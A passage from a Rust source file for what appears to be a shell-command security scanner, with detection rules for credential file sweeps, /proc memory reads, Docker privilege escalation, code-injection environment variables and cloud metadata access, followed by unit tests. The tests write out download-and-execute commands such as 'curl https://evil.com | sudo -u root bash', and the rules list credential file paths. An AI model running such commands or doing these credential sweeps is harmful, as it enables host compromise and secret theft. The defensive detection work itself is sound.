1140                mitre_id: None,
1141                custom_rule_id: None,
1142            });
1143        }
1144    }
1145}
1146
1147fn check_archive_extract(segments: &[tokenize::Segment], findings: &mut Vec<Finding>) {
1148    for segment in segments {
1149        if let Some(ref cmd) = segment.command {
1150            let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd).to_lowercase();
1151            if cmd_base == "tar" || cmd_base == "unzip" || cmd_base == "7z" {
1152                // Check if extracting to a sensitive directory
1153                let raw = &segment.raw;
1154                let sensitive_targets = [
1155                    "-C /",
1156                    "-C ~/",
1157                    "-C $HOME/",
1158                    "-d /",
1159                    "-d ~/",
1160                    "-d $HOME/",
1161                    "> ~/.",
1162                    ">> ~/.",
1163                ];
1164                for target in &sensitive_targets {
1165                    if raw.contains(target) {
1166                        findings.push(Finding {
1167                            rule_id: RuleId::ArchiveExtract,
1168                            severity: Severity::Medium,
1169                            title: "Archive extraction to sensitive path".to_string(),
1170                            description: format!(
1171                                "Archive command '{cmd_base}' extracts to a potentially sensitive location"
1172                            ),
1173                            evidence: vec![Evidence::CommandPattern {
1174                                pattern: "archive extract".to_string(),
1175                                matched: redact::redact_shell_assignments(raw),
1176                            }],
1177                            human_view: None,
1178                            agent_view: None,
1179                mitre_id: None,
1180                custom_rule_id: None,
1181                        });
1182                        return;
1183                    }
1184                }
1185            }
1186        }
1187    }
1188}
1189
1190// ---------------------------------------------------------------------------
1191// Process memory access detection
1192// ---------------------------------------------------------------------------
1193
1194/// Commands that read file contents — scoped to utilities commonly used
1195/// for proc memory dumping. Excludes echo/printf (not file readers).
1196const PROC_MEM_READER_CMDS: &[&str] = &[
1197    "cat", "dd", "strings", "head", "tail", "xxd", "od", "base64", "hexdump", "less", "more", "cp",
1198    "grep",
1199];
1200
1201static PROC_MEM_RE: Lazy<Regex> =
1202    Lazy::new(|| Regex::new(r"/proc/(?:self|\d+)/mem\b").expect("PROC_MEM_RE"));
1203
1204fn check_proc_mem_access(
1205    segments: &[tokenize::Segment],
1206    shell: ShellType,
1207    findings: &mut Vec<Finding>,
1208) {
1209    for seg in segments {
1210        let effective_seg =
1211            unwrap_env_split_string_segment(seg, shell).unwrap_or_else(|| seg.clone());
1212        let resolved_cmd = resolve_base_through_wrappers(&effective_seg, shell);
1213        if !PROC_MEM_READER_CMDS.contains(&resolved_cmd.as_str()) {
1214            continue;
1215        }
1216
1217        for arg in &effective_seg.args {
1218            let normalized = normalize_shell_token(arg, shell);
1219            if PROC_MEM_RE.is_match(&normalized) {
1220                findings.push(Finding {
1221                    rule_id: RuleId::ProcMemAccess,
1222                    severity: Severity::High,
1223                    title: "Process memory access detected".to_string(),
1224                    description: "Command reads from /proc/*/mem, which can dump process memory \
1225                                  contents including secrets and credentials"
1226                        .to_string(),
1227                    evidence: vec![Evidence::CommandPattern {
1228                        pattern: "proc memory read".to_string(),
1229                        matched: redact::redact_shell_assignments(&seg.raw),
1230                    }],
1231                    human_view: None,
1232                    agent_view: None,
1233                    mitre_id: None,
1234                    custom_rule_id: None,
1235                });
1236                return;
1237            }
1238            // dd-style: if=/proc/self/mem
1239            if let Some(val) = normalized.strip_prefix("if=") {
1240                if PROC_MEM_RE.is_match(val) {
1241                    findings.push(Finding {
1242                        rule_id: RuleId::ProcMemAccess,
1243                        severity: Severity::High,
1244                        title: "Process memory access detected".to_string(),
1245                        description: "Command reads from /proc/*/mem via dd, which can dump \
1246                                      process memory contents including secrets and credentials"
1247                            .to_string(),
1248                        evidence: vec![Evidence::CommandPattern {
1249                            pattern: "proc memory read".to_string(),
1250                            matched: redact::redact_shell_assignments(&seg.raw),
1251                        }],
1252                        human_view: None,
1253                        agent_view: None,
1254                        mitre_id: None,
1255                        custom_rule_id: None,
1256                    });
1257                    return;
1258                }
1259            }
1260        }
1261    }
1262}
1263
1264// ---------------------------------------------------------------------------
1265// Docker remote privilege escalation detection
1266// ---------------------------------------------------------------------------
1267
1268fn check_docker_remote_privesc(
1269    segments: &[tokenize::Segment],
1270    shell: ShellType,
1271    findings: &mut Vec<Finding>,
1272) {
1273    for seg in segments {
1274        let effective_seg =
1275            unwrap_env_split_string_segment(seg, shell).unwrap_or_else(|| seg.clone());
1276        let resolved_cmd = resolve_base_through_wrappers(&effective_seg, shell);
1277        if resolved_cmd != "docker" && resolved_cmd != "podman" {
1278            continue;
1279        }
1280
1281        let norm_args: Vec<String> = effective_seg
1282            .args
1283            .iter()
1284            .map(|a| normalize_shell_token(a, shell))
1285            .collect();
1286
1287        let has_remote = detect_docker_remote_host(&norm_args, &effective_seg, shell);
1288        if !has_remote {
1289            continue;
1290        }
1291
1292        let has_priv = norm_args.iter().any(|a| a == "--privileged");
1293        let has_root_mount = has_docker_root_mount(&norm_args);
1294
1295        if has_priv || has_root_mount {
1296            findings.push(Finding {
1297                rule_id: RuleId::DockerRemotePrivEsc,
1298                severity: Severity::Critical,
1299                title: "Docker remote privileged escalation detected".to_string(),
1300                description: "Command targets a remote Docker daemon with privileged access or \
1301                              host root mount, enabling full host compromise"
1302                    .to_string(),
1303                evidence: vec![Evidence::CommandPattern {
1304                    pattern: "docker remote privesc".to_string(),
1305                    matched: redact::redact_shell_assignments(&seg.raw),
1306                }],
1307                human_view: None,
1308                agent_view: None,
1309                mitre_id: None,
1310                custom_rule_id: None,
1311            });
1312            return;
1313        }
1314    }
1315}
1316
1317fn detect_docker_remote_host(
1318    norm_args: &[String],
1319    seg: &tokenize::Segment,
1320    shell: ShellType,
1321) -> bool {
1322    for (i, arg) in norm_args.iter().enumerate() {
1323        let lower = arg.to_lowercase();
1324        // -H=tcp://... or --host=tcp://... (combined form, quotes already stripped)
1325        if arg.starts_with("-H=tcp://") || lower.starts_with("--host=tcp://") {
1326            return true;
1327        }
1328        // -H tcp://... or --host tcp://... (flag + next arg)
1329        if arg == "-H" || lower == "--host" {
1330            if let Some(next) = norm_args.get(i + 1) {
1331                if next.starts_with("tcp://") {
1332                    return true;
1333                }
1334            }
1335        }
1336    }
1337    // DOCKER_HOST=tcp://... as env prefix (Path A: direct leading env assignment)
1338    for (name, value) in tokenize::leading_env_assignments(&seg.raw) {
1339        if name.eq_ignore_ascii_case("DOCKER_HOST") {
1340            let clean_val = normalize_shell_token(&value, shell);
1341            if clean_val.starts_with("tcp://") {
1342                return true;
1343            }
1344        }
1345    }
1346    // Path B: env wrapper form (env DOCKER_HOST=tcp://... docker ...)
1347    // Skip DOCKER_HOST= args that follow -e/--env (those set container env, not client remote)
1348    let args = &seg.args;
1349    for (i, arg) in args.iter().enumerate() {
1350        let norm = normalize_shell_token(arg, shell);
1351        if let Some(val) = norm
1352            .strip_prefix("DOCKER_HOST=")
1353            .or_else(|| norm.strip_prefix("docker_host="))
1354        {
1355            // Check if this arg is a container -e/--env value (not client config)
1356            if i > 0 {
1357                let prev = normalize_shell_token(&args[i - 1], shell);
1358                let prev_lower = prev.to_lowercase();
1359                if prev_lower == "-e" || prev_lower == "--env" {
1360                    continue; // container env, not client remote
1361                }
1362            }
1363            let clean_val = normalize_shell_token(val, shell);
1364            if clean_val.starts_with("tcp://") {
1365                return true;
1366            }
1367        }
1368    }
1369    false
1370}
1371
1372fn has_docker_root_mount(norm_args: &[String]) -> bool {
1373    for (i, arg) in norm_args.iter().enumerate() {
1374        let lower = arg.to_lowercase();
1375        // -v /:/... or --volume /:/... (flag + next value)
1376        if lower == "-v" || lower == "--volume" {
1377            if let Some(val) = norm_args.get(i + 1) {
1378                if val.starts_with("/:/") {
1379                    return true;
1380                }
1381            }
1382        }
1383        // -v=/:/... or --volume=/:/...
1384        if lower.starts_with("-v=/:/") || lower.starts_with("--volume=/:/") {
1385            return true;
1386        }
1387        // --mount type=bind,src=/,dst=/...
1388        let mount_val = if lower == "--mount" {
1389            norm_args.get(i + 1).map(|s| s.as_str())
1390        } else {
1391            lower.strip_prefix("--mount=")
1392        };
1393        if let Some(mv) = mount_val {
1394            if mv.contains("src=/,")
1395                || mv.contains("source=/,")
1396                || mv.ends_with("src=/")
1397                || mv.ends_with("source=/")
1398            {
1399                return true;
1400            }
1401        }
1402    }
1403    false
1404}
1405
1406// ---------------------------------------------------------------------------
1407// Credential file sweep detection
1408// ---------------------------------------------------------------------------
1409
1410const CREDENTIAL_PATHS: &[&str] = &[
1411    "/.ssh/id_",
1412    "/.ssh/authorized_keys",
1413    "/.aws/credentials",
1414    "/.aws/config",
1415    "/.docker/config.json",
1416    "/.kube/config",
1417    "/.config/gcloud/",
1418    "/.npmrc",
1419    "/.pypirc",
1420    "/.netrc",
1421    "/.gnupg/",
1422    "/.config/gh/",
1423    "/.git-credentials",
1424];
1425
1426const READ_ARCHIVE_VERBS: &[&str] = &[
1427    "cat", "tar", "zip", "gzip", "strings", "head", "tail", "base64", "xxd", "dd", "cp", "find",
1428    "xargs",
1429];
1430
1431fn check_credential_file_sweep(
1432    segments: &[tokenize::Segment],
1433    shell: ShellType,
1434    context: ScanContext,
1435    findings: &mut Vec<Finding>,
1436) {
1437    if context != ScanContext::Exec {
1438        return;
1439    }
1440
1441    for seg in segments {
1442        let effective_seg =
1443            unwrap_env_split_string_segment(seg, shell).unwrap_or_else(|| seg.clone());
1444        let resolved_cmd = resolve_base_through_wrappers(&effective_seg, shell);
1445        if !READ_ARCHIVE_VERBS.contains(&resolved_cmd.as_str()) {
1446            continue;
1447        }
1448
1449        let norm_args: Vec<String> = effective_seg
1450            .args
1451            .iter()
1452            .map(|a| normalize_shell_token(a, shell))
1453            .collect();
1454        let seg_text = norm_args.join(" ");
1455        let matched_count = CREDENTIAL_PATHS
1456            .iter()
1457            .filter(|p| seg_text.contains(**p))
1458            .count();
1459
1460        if matched_count >= 2 {
1461            findings.push(Finding {
1462                rule_id: RuleId::CredentialFileSweep,
1463                severity: Severity::Medium,
1464                title: "Multiple credential files accessed".to_string(),
1465                description: format!(
1466                    "Command accesses {matched_count} known credential file paths in a single \
1467                     invocation, which may indicate credential harvesting"
1468                ),
1469                evidence: vec![Evidence::CommandPattern {
1470                    pattern: "credential file sweep".to_string(),
1471                    matched: redact::redact_shell_assignments(&seg.raw),
1472                }],
1473                human_view: None,
1474                agent_view: None,
1475                mitre_id: None,
1476                custom_rule_id: None,
1477            });
1478            return;
1479        }
1480    }
1481}
1482
1483// ---------------------------------------------------------------------------
1484// Phase 8: Dangerous environment variable detection
1485// ---------------------------------------------------------------------------
1486
1487/// Environment variables that enable arbitrary code injection via dynamic linker.
1488const CODE_INJECTION_VARS: &[&str] = &[
1489    "LD_PRELOAD",
1490    "LD_LIBRARY_PATH",
1491    "LD_AUDIT",
1492    "DYLD_INSERT_LIBRARIES",
1493    "DYLD_LIBRARY_PATH",
1494];
1495
1496/// Environment variables that cause arbitrary script execution at shell startup.
1497const SHELL_INJECTION_VARS: &[&str] = &["BASH_ENV", "ENV", "PROMPT_COMMAND"];
1498
1499/// Environment variables that hijack interpreter module/library search paths.
1500const INTERPRETER_HIJACK_VARS: &[&str] = &["PYTHONPATH", "NODE_OPTIONS", "RUBYLIB", "PERL5LIB"];
1501
1502/// Sensitive credential variable names that should not be exported in commands.
1503use super::shared::SENSITIVE_KEY_VARS;
1504
1505fn classify_env_var(name: &str) -> Option<(RuleId, Severity, &'static str, &'static str)> {
1506    let name_upper = name.to_ascii_uppercase();
1507    let name = name_upper.as_str();
1508    if CODE_INJECTION_VARS.contains(&name) {
1509        Some((
1510            RuleId::CodeInjectionEnv,
1511            Severity::Critical,
1512            "Code injection environment variable",
1513            "can inject shared libraries into all processes, enabling arbitrary code execution",
1514        ))
1515    } else if SHELL_INJECTION_VARS.contains(&name) {
1516        Some((
1517            RuleId::ShellInjectionEnv,
1518            Severity::Critical,
1519            "Shell injection environment variable",
1520            "can cause arbitrary script execution at shell startup",
1521        ))
1522    } else if INTERPRETER_HIJACK_VARS.contains(&name) {
1523        Some((
1524            RuleId::InterpreterHijackEnv,
1525            Severity::High,
1526            "Interpreter hijack environment variable",
1527            "can hijack the interpreter's module/library search path",
1528        ))
1529    } else if SENSITIVE_KEY_VARS.contains(&name) {
1530        Some((
1531            RuleId::SensitiveEnvExport,
1532            Severity::High,
1533            "Sensitive credential exported",
1534            "exposes a sensitive credential that may be logged in shell history",
1535        ))
1536    } else {
1537        None
1538    }
1539}
1540
1541/// Cargo global flags that consume the next token as a value.
1542const CARGO_VALUE_FLAGS: &[&str] = &[
1543    "-Z",
1544    "-C",
1545    "--config",
1546    "--manifest-path",
1547    "--color",
1548    "--target-dir",
1549    "--target",
1550];
1551
1552/// Find the cargo subcommand (first positional arg), skipping flags and toolchain specs.
1553/// Returns true if the subcommand is `install` or `add`.
1554fn is_cargo_install_or_add(args: &[String]) -> bool {
1555    let mut skip_next = false;
1556    for arg in args {
1557        if skip_next {
1558            skip_next = false;
1559            continue;
1560        }
1561        // Toolchain specs (+nightly, +stable)
1562        if arg.starts_with('+') {
1563            continue;
1564        }
1565        // Long flags with = (--config=foo): skip this arg only
1566        if arg.starts_with("--") && arg.contains('=') {
1567            continue;
1568        }
1569        // Known value-taking flags: skip this AND next
1570        if CARGO_VALUE_FLAGS.contains(&arg.as_str()) {
1571            skip_next = true;
1572            continue;
1573        }
1574        // Other flags (--locked, -v, etc.)
1575        if arg.starts_with('-') {
1576            continue;
1577        }
1578        // First positional arg is the subcommand — only match install/add
1579        return arg == "install" || arg == "add";
1580    }
1581    false
1582}
1583
1584/// Warn when `cargo install/add` is used and no supply-chain audit directory exists.
1585fn check_vet_not_configured(
1586    segments: &[tokenize::Segment],
1587    cwd: Option<&str>,
1588    findings: &mut Vec<Finding>,
1589) {
1590    let is_cargo_install = segments.iter().any(|s| {
1591        if let Some(ref cmd) = s.command {
1592            let base = cmd
1593                .rsplit(['/', '\\'])
1594                .next()
1595                .unwrap_or(cmd)
1596                .to_ascii_lowercase();
1597            let base = base.strip_suffix(".exe").unwrap_or(&base);
1598            if base == "cargo" {
1599                return is_cargo_install_or_add(&s.args);
1600            }
1601        }
1602        false
1603    });
1604    if !is_cargo_install {
1605        return;
1606    }
1607
1608    // Check if supply-chain/ config exists relative to the analysis context cwd.
1609    // Require an explicit cwd — without one we cannot reliably check the filesystem.
1610    let cwd = match cwd {
1611        Some(dir) => dir,
1612        None => return,
1613    };
1614    let check_path = std::path::PathBuf::from(cwd).join("supply-chain/config.toml");
1615    if check_path.exists() {
1616        return;
1617    }
1618
1619    findings.push(Finding {
1620        rule_id: RuleId::VetNotConfigured,
1621        severity: Severity::Low,
1622        title: "No supply-chain audit configured".into(),
1623        description: "Consider running `cargo vet init` to enable dependency auditing.".into(),
1624        evidence: vec![],
1625        human_view: None,
1626        agent_view: None,
1627        mitre_id: None,
1628        custom_rule_id: None,
1629    });
1630}
1631
1632fn check_env_var_in_command(segments: &[tokenize::Segment], findings: &mut Vec<Finding>) {
1633    for segment in segments {
1634        let Some(ref cmd) = segment.command else {
1635            continue;
1636        };
1637        let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd).to_lowercase();
1638
1639        match cmd_base.as_str() {
1640            "export" => {
1641                for arg in &segment.args {
1642                    if let Some((var_name, value)) = arg.split_once('=') {
1643                        emit_env_finding(var_name.trim(), value, findings);
1644                    }
1645                }
1646            }
1647            "env" => {
1648                for arg in &segment.args {
1649                    let trimmed = arg.trim();
1650                    if trimmed.starts_with('-') {
1651                        continue;
1652                    }
1653                    if let Some((var_name, value)) = trimmed.split_once('=') {
1654                        emit_env_finding(var_name.trim(), value, findings);
1655                    }
1656                }
1657            }
1658            "set" => {
1659                // Fish shell: set [-gx] VAR_NAME value...
1660                let mut var_name: Option<&str> = None;
1661                let mut value_parts: Vec<&str> = Vec::new();
1662                for arg in &segment.args {
1663                    let trimmed = arg.trim();
1664                    if trimmed.starts_with('-') && var_name.is_none() {
1665                        continue;
1666                    }
1667                    if var_name.is_none() {
1668                        var_name = Some(trimmed);
1669                    } else {
1670                        value_parts.push(trimmed);
1671                    }
1672                }
1673                if let Some(name) = var_name {
1674                    emit_env_finding(name, &value_parts.join(" "), findings);
1675                }
1676            }
1677            _ => {}
1678        }
1679    }
1680}
1681
1682fn emit_env_finding(var_name: &str, value: &str, findings: &mut Vec<Finding>) {
1683    let Some((rule_id, severity, title_prefix, desc_suffix)) = classify_env_var(var_name) else {
1684        return;
1685    };
1686    let value_preview = redact_env_value(value);
1687    findings.push(Finding {
1688        rule_id,
1689        severity,
1690        title: format!("{title_prefix}: {var_name}"),
1691        description: format!("Setting {var_name} {desc_suffix}"),
1692        evidence: vec![Evidence::EnvVar {
1693            name: var_name.to_string(),
1694            value_preview,
1695        }],
1696        human_view: None,
1697        agent_view: None,
1698        mitre_id: None,
1699        custom_rule_id: None,
1700    });
1701}
1702
1703fn redact_env_value(val: &str) -> String {
1704    if val.is_empty() {
1705        String::new()
1706    } else {
1707        "[REDACTED]".to_string()
1708    }
1709}
1710
1711// ---------------------------------------------------------------------------
1712// Phase 9 (free): Network destination detection
1713// ---------------------------------------------------------------------------
1714
1715/// Cloud metadata endpoint IPs that expose instance credentials.
1716const METADATA_ENDPOINTS: &[&str] = &["169.254.169.254", "100.100.100.200"];
1717
1718fn check_host_for_network_issues(arg: &str, findings: &mut Vec<Finding>) {
1719    if let Some(host) = extract_host_from_arg(arg) {
1720        if METADATA_ENDPOINTS.contains(&host.as_str()) {
1721            findings.push(Finding {
1722                rule_id: RuleId::MetadataEndpoint,
1723                severity: Severity::Critical,
1724                title: format!("Cloud metadata endpoint access: {host}"),
1725                description: format!(
1726                    "Command accesses cloud metadata endpoint {host}, \
1727                     which can expose instance credentials and sensitive configuration"
1728                ),
1729                evidence: vec![Evidence::Url {
1730                    raw: arg.to_string(),
1731                }],
1732                human_view: None,
1733                agent_view: None,
1734                mitre_id: None,
1735                custom_rule_id: None,
1736            });
1737        } else if is_private_ip(&host) {
1738            findings.push(Finding {
1739                rule_id: RuleId::PrivateNetworkAccess,
1740                severity: Severity::High,
1741                title: format!("Private network access: {host}"),
1742                description: format!(
1743                    "Command accesses private network address {host}, \
1744                     which may indicate SSRF or lateral movement"
1745                ),
1746                evidence: vec![Evidence::Url {
1747                    raw: arg.to_string(),
1748                }],
1749                human_view: None,
1750                agent_view: None,
1751                mitre_id: None,
1752                custom_rule_id: None,
1753            });
1754        }
1755    }
1756}
1757
1758fn check_network_destination(segments: &[tokenize::Segment], findings: &mut Vec<Finding>) {
1759    for segment in segments {
1760        let Some(ref cmd) = segment.command else {
1761            continue;
1762        };
1763        let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd).to_lowercase();
1764        if !is_source_command(&cmd_base) {
1765            continue;
1766        }
1767
1768        for arg in &segment.args {
1769            let trimmed = arg.trim().trim_matches(|c: char| c == '\'' || c == '"');
1770            if trimmed.starts_with('-') {
1771                // Check flag=value args for embedded URLs (e.g., --url=http://evil.com)
1772                if let Some((_flag, value)) = trimmed.split_once('=') {
1773                    check_host_for_network_issues(value, findings);
1774                }
1775                continue;
1776            }
1777
1778            check_host_for_network_issues(trimmed, findings);
1779        }
1780    }
1781}
1782
1783/// Extract a host/IP from a URL-like command argument.
1784fn extract_host_from_arg(arg: &str) -> Option<String> {
1785    // URL with scheme: http://HOST[:PORT]/path
1786    if let Some(scheme_end) = arg.find("://") {
1787        let after_scheme = &arg[scheme_end + 3..];
1788        // Strip userinfo (anything before @)
1789        let after_userinfo = if let Some(at_idx) = after_scheme.find('@') {
1790            &after_scheme[at_idx + 1..]
1791        } else {
1792            after_scheme
1793        };
1794        // Get host:port (before first /)
1795        let host_port = after_userinfo.split('/').next().unwrap_or(after_userinfo);
1796        let host = strip_port(host_port);
1797        // Reject obviously invalid hosts (malformed brackets, embedded paths)
1798        if host.is_empty() || host.contains('/') || host.contains('[') {
1799            return None;
1800        }
1801        return Some(host);
1802    }
1803
1804    // Bare host/IP: "169.254.169.254/path" or just "169.254.169.254"
1805    let host_part = arg.split('/').next().unwrap_or(arg);
1806    let host = strip_port(host_part);
1807
1808    // Accept valid IPv4 addresses for bare hosts (no scheme)
1809    if host.parse::<std::net::Ipv4Addr>().is_ok() {
1810        return Some(host);
1811    }
1812
1813    // Accept bracketed IPv6: [::1]
1814    if host_part.starts_with('[') {
1815        if let Some(bracket_end) = host_part.find(']') {
1816            let ipv6 = &host_part[1..bracket_end];
1817            if ipv6.parse::<std::net::Ipv6Addr>().is_ok() {
1818                return Some(ipv6.to_string());
1819            }
1820        }
1821    }
1822
1823    None
1824}
1825
1826/// Strip port number from a host:port string, handling IPv6 brackets.
1827fn strip_port(host_port: &str) -> String {
1828    // Handle IPv6: [::1]:8080
1829    if host_port.starts_with('[') {
1830        if let Some(bracket_end) = host_port.find(']') {
1831            return host_port[1..bracket_end].to_string();
1832        }
1833    }
1834    // Don't strip from unbracketed IPv6 (multiple colons)
1835    let colon_count = host_port.chars().filter(|&c| c == ':').count();
1836    if colon_count > 1 {
1837        return host_port.to_string(); // IPv6, don't strip
1838    }
1839    // IPv4 or hostname with single colon: strip trailing :PORT
1840    if let Some(colon_idx) = host_port.rfind(':') {
1841        if host_port[colon_idx + 1..].parse::<u16>().is_ok() {
1842            return host_port[..colon_idx].to_string();
1843        }
1844    }
1845    host_port.to_string()
1846}
1847
1848/// Check if an IPv4 address is in a private/reserved range (excluding loopback).
1849fn is_private_ip(host: &str) -> bool {
1850    if let Ok(ip) = host.parse::<std::net::Ipv4Addr>() {
1851        let octets = ip.octets();
1852        // Loopback (127.x) is excluded — local traffic has no SSRF/lateral movement risk.
1853        if octets[0] == 127 {
1854            return false;
1855        }
1856        return octets[0] == 10
1857            || (octets[0] == 172 && (16..=31).contains(&octets[1]))
1858            || (octets[0] == 192 && octets[1] == 168);
1859    }
1860    false
1861}
1862
1863/// POSIX fetch commands — appropriate for both `tirith run` and `vet` hints.
1864const POSIX_FETCH_COMMANDS: &[&str] = &["curl", "wget", "http", "https", "xh", "fetch"];
1865
1866/// PowerShell fetch commands — appropriate for `vet` hints only
1867/// (`tirith run` doesn't support PowerShell interpreter flows).
1868const POWERSHELL_FETCH_COMMANDS: &[&str] =
1869    &["iwr", "irm", "invoke-webrequest", "invoke-restmethod"];
1870
1871/// Source commands that are not URL-fetching (no vet/tirith-run hints).
1872const NON_FETCH_SOURCE_COMMANDS: &[&str] = &["scp", "rsync"];
1873
1874fn is_source_command(cmd: &str) -> bool {
1875    POSIX_FETCH_COMMANDS.contains(&cmd)
1876        || POWERSHELL_FETCH_COMMANDS.contains(&cmd)
1877        || NON_FETCH_SOURCE_COMMANDS.contains(&cmd)
1878}
1879
1880/// All URL-fetching commands (union of POSIX + PowerShell).
1881fn is_url_fetch_command(cmd: &str) -> bool {
1882    POSIX_FETCH_COMMANDS.contains(&cmd) || POWERSHELL_FETCH_COMMANDS.contains(&cmd)
1883}
1884
1885/// Whether this fetch source supports `tirith run` hints.
1886/// True only for POSIX fetch commands (`tirith run` is a shell-script runner).
1887fn supports_tirith_run_hint(cmd: &str) -> bool {
1888    POSIX_FETCH_COMMANDS.contains(&cmd)
1889}
1890
1891/// Check if string starts with http:// or https:// (case-insensitive scheme).
1892fn starts_with_http_scheme(s: &str) -> bool {
1893    let b = s.as_bytes();
1894    (b.len() >= 8 && b[..8].eq_ignore_ascii_case(b"https://"))
1895        || (b.len() >= 7 && b[..7].eq_ignore_ascii_case(b"http://"))
1896}
1897
1898/// Strip control characters (0x00–0x1F, 0x7F) from a URL so it cannot inject
1899/// ANSI escapes, newlines, or other terminal-interpreted sequences into the
1900/// finding description displayed to the user.
1901fn sanitize_url_for_display(url: &str) -> String {
1902    url.chars().filter(|&c| !c.is_ascii_control()).collect()
1903}
1904
1905/// Extract all URLs from command arguments.
1906fn extract_urls_from_args(args: &[String], shell: ShellType) -> Vec<String> {
1907    let mut urls = Vec::new();
1908    for arg in args {
1909        let normalized = normalize_shell_token(arg.trim(), shell);
1910
1911        if starts_with_http_scheme(&normalized) {
1912            urls.push(normalized);
1913            continue;
1914        }
1915
1916        // Check --flag=<url> forms (e.g., --url=https://...)
1917        if let Some((_, val)) = normalized.split_once('=') {
1918            if starts_with_http_scheme(val) {
1919                urls.push(val.to_string());
1920            }
1921        }
1922    }
1923    urls
1924}
1925
1926/// Check command destination hosts against policy network deny/allow lists (Team feature).
1927///
1928/// For each source command (curl, wget, etc.), extracts the destination host and
1929/// checks against deny/allow lists. Allow takes precedence (exempts from deny).
1930pub fn check_network_policy(
1931    input: &str,
1932    shell: ShellType,
1933    deny: &[String],
1934    allow: &[String],
1935) -> Vec<Finding> {
1936    if deny.is_empty() {
1937        return Vec::new();
1938    }
1939
1940    let segments = tokenize::tokenize(input, shell);
1941    let mut findings = Vec::new();
1942
1943    for segment in &segments {
1944        let Some(ref cmd) = segment.command else {
1945            continue;
1946        };
1947        let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd).to_lowercase();
1948        if !is_source_command(&cmd_base) {
1949            continue;
1950        }
1951
1952        for arg in &segment.args {
1953            let trimmed = arg.trim().trim_matches(|c: char| c == '\'' || c == '"');
1954            if trimmed.starts_with('-') {
1955                // Check flag=value args for embedded URLs (e.g., --url=http://evil.com)
1956                if let Some((_flag, value)) = trimmed.split_once('=') {
1957                    if let Some(host) = extract_host_from_arg(value) {
1958                        if matches_network_list(&host, allow) {
1959                            continue;
1960                        }
1961                        if matches_network_list(&host, deny) {
1962                            findings.push(Finding {
1963                                rule_id: RuleId::CommandNetworkDeny,
1964                                severity: Severity::Critical,
1965                                title: format!("Network destination denied by policy: {host}"),
1966                                description: format!(
1967                                    "Command accesses {host}, which is on the network deny list"
1968                                ),
1969                                evidence: vec![Evidence::Url {
1970                                    raw: value.to_string(),
1971                                }],
1972                                human_view: None,
1973                                agent_view: None,
1974                                mitre_id: None,
1975                                custom_rule_id: None,
1976                            });
1977                            continue;
1978                        }
1979                    }
1980                }
1981                continue;
1982            }
1983
1984            if let Some(host) = extract_host_from_arg(trimmed) {
1985                // Allow list exempts from deny
1986                if matches_network_list(&host, allow) {
1987                    continue;
1988                }
1989                if matches_network_list(&host, deny) {
1990                    findings.push(Finding {
1991                        rule_id: RuleId::CommandNetworkDeny,
1992                        severity: Severity::Critical,
1993                        title: format!("Network destination denied by policy: {host}"),
1994                        description: format!(
1995                            "Command accesses {host}, which is on the network deny list"
1996                        ),
1997                        evidence: vec![Evidence::Url {
1998                            raw: trimmed.to_string(),
1999                        }],
2000                        human_view: None,
2001                        agent_view: None,
2002                        mitre_id: None,
2003                        custom_rule_id: None,
2004                    });
2005                    return findings;
2006                }
2007            }
2008        }
2009    }
2010
2011    findings
2012}
2013
2014/// Check if a host matches any entry in a network list.
2015///
2016/// Supports exact hostname match, suffix match (`.example.com` matches
2017/// `sub.example.com`), and CIDR match for IPv4 addresses.
2018fn matches_network_list(host: &str, list: &[String]) -> bool {
2019    for entry in list {
2020        // CIDR match: "10.0.0.0/8"
2021        if entry.contains('/') {
2022            if let Some(matched) = cidr_contains(host, entry) {
2023                if matched {
2024                    return true;
2025                }
2026                continue;
2027            }
2028        }
2029
2030        // Exact match
2031        if host.eq_ignore_ascii_case(entry) {
2032            return true;
2033        }
2034
2035        // Suffix match: entry "example.com" matches "sub.example.com"
2036        if host.len() > entry.len()
2037            && host.ends_with(entry.as_str())
2038            && host.as_bytes()[host.len() - entry.len() - 1] == b'.'
2039        {
2040            return true;
2041        }
2042    }
2043    false
2044}
2045
2046/// Check if an IPv4 address is within a CIDR range.
2047/// Returns `Some(true/false)` if both parse, `None` if either fails.
2048fn cidr_contains(host: &str, cidr: &str) -> Option<bool> {
2049    let parts: Vec<&str> = cidr.splitn(2, '/').collect();
2050    if parts.len() != 2 {
2051        return None;
2052    }
2053    let network: std::net::Ipv4Addr = parts[0].parse().ok()?;
2054    let prefix_len: u32 = parts[1].parse().ok()?;
2055    if prefix_len > 32 {
2056        return None;
2057    }
2058    let host_ip: std::net::Ipv4Addr = host.parse().ok()?;
2059
2060    let mask = if prefix_len == 0 {
2061        0u32
2062    } else {
2063        !0u32 << (32 - prefix_len)
2064    };
2065    let net_bits = u32::from(network) & mask;
2066    let host_bits = u32::from(host_ip) & mask;
2067
2068    Some(net_bits == host_bits)
2069}
2070
2071#[cfg(test)]
2072mod tests {
2073    use super::*;
2074
2075    /// Helper: run `check()` with no cwd and Exec context (the common case for tests).
2076    fn check_default(input: &str, shell: ShellType) -> Vec<Finding> {
2077        check(input, shell, None, ScanContext::Exec)
2078    }
2079
2080    #[test]
2081    fn test_pipe_sudo_flags_detected() {
2082        let findings = check_default(
2083            "curl https://evil.com | sudo -u root bash",
2084            ShellType::Posix,
2085        );
2086        assert!(
2087            findings
2088                .iter()
2089                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
2090            "should detect pipe through sudo -u root bash"
2091        );
2092    }
2093
2094    #[test]
2095    fn test_pipe_sudo_long_flag_detected() {
2096        let findings = check_default(
2097            "curl https://evil.com | sudo --user=root bash",
2098            ShellType::Posix,
2099        );
2100        assert!(
2101            findings
2102                .iter()
2103                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
2104            "should detect pipe through sudo --user=root bash"
2105        );
2106    }
2107
2108    #[test]
2109    fn test_pipe_env_var_assignment_detected() {
2110        let findings = check_default("curl https://evil.com | env VAR=1 bash", ShellType::Posix);
2111        assert!(
2112            findings
2113                .iter()
2114                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
2115            "should detect pipe through env VAR=1 bash"
2116        );
2117    }
2118
2119    #[test]
2120    fn test_pipe_env_u_flag_detected() {
2121        let findings = check_default("curl https://evil.com | env -u HOME bash", ShellType::Posix);
2122        assert!(
2123            findings
2124                .iter()
2125                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
